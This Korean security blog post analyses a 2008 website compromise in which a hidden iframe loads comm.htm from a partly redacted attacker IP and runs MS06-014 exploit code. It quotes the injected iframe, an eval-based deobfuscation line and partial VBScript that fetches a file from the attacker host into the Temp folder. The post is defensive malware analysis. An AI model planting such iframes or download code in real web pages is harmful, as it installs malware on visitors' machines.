태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'익스플로잇'에 해당되는 글 1건

  1. 2008.02.27 멍청한 Exploit Code?
바이러스분석2008.02.27 09:39


특정 웹 사이트가 해킹되어 일부 웹 페이지에 악성 아이프레임 소스가 추가되었다.

<iframe src=http://121.[삭제].130/comm.htm width=0 height=0></iframe>

그런데 재밌는것이 연결이 시도되는 comm.htm 내부 명령이다.

이 파일에는 스크립트 명령을 통해서 일부 코드를 알아보기 어렵게(암호화) 해 두었다.

t=eval("String.fromCharCode("+t+")");

이 코드를 복호화하면 사용자가 알아차리지 못하게 function init() / window.onload = init; 함수를 이용하여 아래와 같은 문구가 보여지게 만든다.

No web site is configured at this address.

사용자 삽입 이미지

여기서 재밌는 것은 실제 사용된 MS06-014 Exploit Code 의 최종 설치 파일이 아래와 같이 다시 comm.htm 파일이라는 것이다.

<script language="VBScript">
On Error Resume Next
exe = "http://121.[삭제].130/comm.htm"
하위생략
</script>

그렇게 되다보니 아래와 같은 오류창이 출력되는데, 이는 Temp 폴더에 vv.com 으로 생성시키는 명령 때문이다. 정상적인 PE 파일이 아니기 때문이다.

vv2="GET"
x.Open vv2, exe, False
x.Send
fname1="vv.com"
Set F = vv.CreateObject("Scripting.FileSystemObject","")
Set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)

사용자 삽입 이미지

사용자 삽입 이미지

공격자는 악성코드 링크를 지정하는 과정에서 딴 생각(?)을 했나보다. 의도하진 않았겠지만 사용자의 화면에는 위와 같은 오류창(16비트 MS-DOS 하위 시스템)이 출력된다.

공격자는 아마 자기 코드가 정상적으로 작동한다고 생각하고 있을지도 모르겠고, 나중에 발견하여 수정을 하게 될지도 모르겠다.

몇일 두고보면서 공격자의 활동을 예의주시해야 겠다.
Posted by viruslab

댓글을 달아 주세요